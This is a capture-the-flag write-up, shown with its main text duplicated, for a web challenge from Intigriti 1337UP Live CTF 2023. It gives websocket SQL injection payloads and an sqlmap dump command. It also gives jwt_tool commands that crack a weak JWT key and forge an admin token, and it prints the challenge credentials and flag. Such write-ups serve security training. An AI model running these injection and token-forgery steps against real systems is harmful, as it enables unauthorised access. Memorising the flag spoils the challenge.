Bug Report Repo

Writeup for Bug Report Repo (Web) - Intigriti 1337UP Live CTF (2023) 💜

Video Walkthrough

Description

I started my own bug bounty platform! The UI is in the early stages but we've already got plenty of submissions. I wonder why I keep getting emails about a "critical" vulnerability report though, I don't see it anywhere on the system 😕

Part 1: Websocket SQLi

Players can use burp repeater to tamper with websocket requests, if they set the ID to 11, they will find an extra name ethical_hacker
If they probe with quotes, they will see errors then quickly find SQLi
- {"id":"1 AND 1=1"}
- {"id":"1 AND 1=2"}
Using this information, they will see need to dump the hidden row, either by filtering on id, reported_by or severity
Players can write a script, but may find this 2021 writeup from Rayhan to use SQLMap, but the script won't work by default:
- They need to change the ws protocol to wss for remote
- The DB is SQLite instead of MySQL, negative values in SQLMap will cause the script to freeze - players will need to add a timeout or logic to skip negative values
Launch the middleware script (sqlmap_proxy.py)
sqlmap -u "http://localhost:9999/?id=1" --batch --proxy=http://127.0.0.1:8080 -T bug_reports -C description --where id=11 --dump --threads 10
The hidden bug report is returned, which indicates there's an admin endpoint with weak creds

+--------------------------------------+
| description                          |
+--------------------------------------+
| crypt0:c4tz on /4dm1n_z0n3, really?! |
+--------------------------------------+

Part 2: Weak JWT Signing Key

Players visit /4dm1n_z0n3 and login with crypt0:c4tz
They see a message saying the key is only viewable by the admin
Crack the JWT with hashcat/john/jwt_tool etc, finding the key catsarethebest (present in rockyou.txt), e.g. jwt_tool takes like 3 secs
- jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImNhdCJ9.HJxAqYHm9TG8PBmMScRGsAPcK5vymC6AS4brUyfH7VA -C -d /usr/share/wordlists/rockyou.txt
Forge JWT as admin, e.g. with jwt_tool
- jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImNhdCJ9.HJxAqYHm9TG8PBmMScRGsAPcK5vymC6AS4brUyfH7VA -S hs256 -p "catsarethebest" -I -pc identity -pv admin
Login with the new cookie, revealing the config key which is the flag!

Flag: INTIGRITI{w3b50ck37_5ql1_4nd_w34k_jw7}

PreviousWeb NextMy Music

Last updated 4 months ago

Part 1: Websocket SQLi

Players can use burp repeater to tamper with websocket requests, if they set the ID to 11, they will find an extra name ethical_hacker

If they probe with quotes, they will see errors then quickly find SQLi

{"id":"1 AND 1=1"}
{"id":"1 AND 1=2"}

Using this information, they will see need to dump the hidden row, either by filtering on id, reported_by or severity

Players can write a script, but may find this 2021 writeup from Rayhan to use SQLMap, but the script won't work by default:

They need to change the ws protocol to wss for remote
The DB is SQLite instead of MySQL, negative values in SQLMap will cause the script to freeze - players will need to add a timeout or logic to skip negative values

Launch the middleware script (sqlmap_proxy.py)

sqlmap -u "http://localhost:9999/?id=1" --batch --proxy=http://127.0.0.1:8080 -T bug_reports -C description --where id=11 --dump --threads 10

The hidden bug report is returned, which indicates there's an admin endpoint with weak creds

+--------------------------------------+
| description                          |
+--------------------------------------+
| crypt0:c4tz on /4dm1n_z0n3, really?! |
+--------------------------------------+

Part 2: Weak JWT Signing Key

Players visit /4dm1n_z0n3 and login with crypt0:c4tz

They see a message saying the key is only viewable by the admin

Crack the JWT with hashcat/john/jwt_tool etc, finding the key catsarethebest (present in rockyou.txt), e.g. jwt_tool takes like 3 secs

jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImNhdCJ9.HJxAqYHm9TG8PBmMScRGsAPcK5vymC6AS4brUyfH7VA -C -d /usr/share/wordlists/rockyou.txt

Forge JWT as admin, e.g. with jwt_tool

jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImNhdCJ9.HJxAqYHm9TG8PBmMScRGsAPcK5vymC6AS4brUyfH7VA -S hs256 -p "catsarethebest" -I -pc identity -pv admin

Flag: INTIGRITI{w3b50ck37_5ql1_4nd_w34k_jw7}